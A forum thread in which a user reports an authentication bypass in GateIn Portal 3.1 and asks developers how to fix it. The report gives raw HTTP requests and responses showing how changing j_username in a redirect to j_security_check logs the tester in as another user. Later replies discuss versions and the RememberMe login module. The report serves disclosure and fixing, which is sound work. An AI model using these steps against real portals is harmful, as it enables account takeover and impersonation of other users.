8 Replies Latest reply on Dec 16, 2013 9:44 PM by haint

How to avoid bypass authentication (detail test steps)

wguo Dec 4, 2013 2:06 AM

Steps to Reproduce:

1. Log into our portal project with correct username and password

POST /portal/login HTTP/1.1

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer:http://XXXX /home?portal:componentId=UIPortal&portal:action=Logout

Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 84

initialURI=%2Fportal%2Fprivate%2Fxxxx0%2Fhome&username=userA&password=xxxx

2. Get a 302 response and open the /portal/private/project/home page

HTTP/1.1 302 Moved Temporarily

Date: Thu, 15 Aug 2013 07:19:48 GMT

X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1

Location: http://XXXX//home

Content-Length: 0

Keep-Alive: timeout=15, max=100

Connection: Keep-Alive

Content-Type: text/plain; charset=UTF-8

GET /portal/private/xxxx/home HTTP/1.1

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://XXXX//home?portal:componentId=UIPortal&portal:action=Logout

Connection: keep-alive

3. Get a 302 response again, which redirect to secure check page with the username, modify the username to someone else that is logged in.

Original message:

HTTP/1.1 302 Moved Temporarily

Date: Thu, 15 Aug 2013 07:29:42 GMT

Pragma: No-cache

Cache-Control: no-cache

Expires: Wed, 31 Dec 1969 19:00:00 EST

Location:http://XXXX//portal/private/xxxx/j_security_check?j_username=userA&j_password=rememberme1447024746

^^^^^^^^^^^^^^^^^

Content-Type: text/html;charset=UTF-8

Content-Length: 0

Keep-Alive: timeout=15, max=100

Connection: Keep-Alive

Modified message:

HTTP/1.1 302 Moved Temporarily

Date: Thu, 15 Aug 2013 07:29:42 GMT

Pragma: No-cache

Cache-Control: no-cache

Expires: Wed, 31 Dec 1969 19:00:00 EST

Location: http://XXXX//portal/private/xxxx/j_security_check?j_username=userB&j_password=rememberme1447024746

^^^^^^^^^^^^^^^^

Content-Type: text/html;charset=UTF-8

Content-Length: 0

Keep-Alive: timeout=15, max=100

Connection: Keep-Alive

4. Send GET request to get the page in "Location" of step3, which is with username "userB"

GET /portal/private/xxx/j_security_check?j_username=userB&j_password=rememberme1447024746 HTTP/1.1

^^^^^^^^^^^^^^^^^^

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://XXXX/portal/private/xxxx/home?portal:componentId=UIPortal&portal:action=Logout

Connection: keep-alive

5. Get the response with code 302 and redirect to home page , attchment1.

6. Click content tab in the home page, it will display now login with "userB", and operations can be performed as userB too,

Actual results:

Successfully bypass authentication.

Expected results:

Should not log into the project with "userB" successfully.

1. Re: How to avoid bypass authentication (detail test steps)

haint Dec 4, 2013 3:37 AM (in response to wguo)

Did you use GateIn 3.1?
Actions
2. Re: How to avoid bypass authentication (detail test steps)

wguo Dec 4, 2013 3:43 AM (in response to haint)

Hi Hai ,

Yeah , i use EPP 5.1.0 , as the release note describe : GateIn Portal Based on 3.1.0 .
Thanks for your quick response , hope there is any advice to resolve it .

Thanks ,
Actions
3. Re: How to avoid bypass authentication (detail test steps)

haint Dec 4, 2013 4:05 AM (in response to wguo)

Could you try to reproduce on Gatein lastest version? This is very helpful for us
Actions
4. Re: How to avoid bypass authentication (detail test steps)

wguo Dec 4, 2013 4:26 AM (in response to haint)

Hi , Hai
We had ever tried to upgrade the EPP to a higher version , but unluckily it didn't work well ( it's really not a simple progress for migrate our project , it depends on too much ) . Have you make a big change on
the related part .
Actions
5. Re: How to avoid bypass authentication (detail test steps)

haint Dec 4, 2013 4:41 AM (in response to wguo)

Actually since version 3.2, it had many differences with 3.1 version. Anyway, we should try to reproduce your case on current version.
Actions
6. Re: How to avoid bypass authentication (detail test steps)

wguo Dec 4, 2013 4:57 AM (in response to haint)

Hi Hai ,

Im not sure if you have a envrionment based on the latest version ( you must have ) , so can you have a simple test according to the steps above (maybe just FormAuth) , i will try to upgrade the version , but i think it's not a easy way for us in current phase .

Thanks for your help .
Actions
7. Re: How to avoid bypass authentication (detail test steps)

wguo Dec 10, 2013 5:34 AM (in response to haint)

Hi Hai ,
We now think maybe caused by the RememberMeFilter function , can you give me some advice how to disable this function .

Thanks !
Actions
8. Re: How to avoid bypass authentication (detail test steps)

haint Dec 16, 2013 9:44 PM (in response to wguo)

Actually, no way to disable RememberMe function because it couples with GateIn Login module. But you could make new Login Module as you want
Actions

Go to original post